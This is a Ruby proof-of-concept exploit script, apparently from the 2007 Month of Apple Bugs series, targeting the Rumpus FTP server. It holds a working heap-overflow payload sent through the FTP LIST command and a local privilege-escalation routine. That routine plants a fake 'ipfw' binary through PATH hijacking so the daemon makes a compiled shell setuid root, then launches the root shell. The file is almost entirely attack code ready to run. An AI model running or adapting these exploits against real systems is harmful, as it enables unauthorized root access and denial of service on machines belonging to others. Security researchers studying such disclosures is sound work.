MOAB-18-01-2007.rb.txt

`#!/usr/bin/ruby  
# Copyright (c) Lance M. Havok <lmh [at] info-pull.com>  
# Keiv Finisterre <kf_lists [at] digitalmunition.com>  
#  
# Proof of concept for issues described in MOAB-18-01-2007.  
  
require 'net/ftp'  
require 'socket'  
  
bugselected = (ARGV[0] || 0).to_i  
target_host = (ARGV[1] || "localhost")  
target_user = (ARGV[2] || "anonymous")  
target_pass = (ARGV[3] || "rumproast")  
  
def list_bug(o)  
payload = "A" * 251  
payload << [0x41424344].pack("V")  
payload << [0x61626364].pack("V")  
payload << [0x30313233].pack("V")  
payload << [0xdeadface].pack("V")  
o.list(payload)  
end  
  
def local_priv_escalation()  
wrapper = 'int main() { setuid(0); setgid(0); system("/bin/sh -i"); return 0; }'  
fake_ipfw = 'int main() { system("/usr/sbin/chown root: /tmp/shX; /bin/chmod 4755 /tmp/shX"); return 0; }'  
command_line = "echo '#{wrapper}' > /tmp/test.c && cc -o /tmp/shX /tmp/test.c && " +  
"echo '#{fake_ipfw}' > /tmp/ipfw.c && cc -o /tmp/ipfw /tmp/ipfw.c && " +  
'export PATH="/tmp/:$PATH" && /usr/local/Rumpus/rumpusd'  
system command_line  
sleep 1  
puts "++ Enjoy root shell..."  
system "/tmp/shX"  
end  
  
case bugselected  
when 0  
puts "++ FTP LIST heap buffer overflow..."  
Net::FTP.open(target_host) do |ftp|  
ftp.login("#{target_user}","#{target_pass}")  
list_bug(ftp)  
end  
when 1  
puts "++ Local privilege escalation..."  
local_priv_escalation()  
end  
`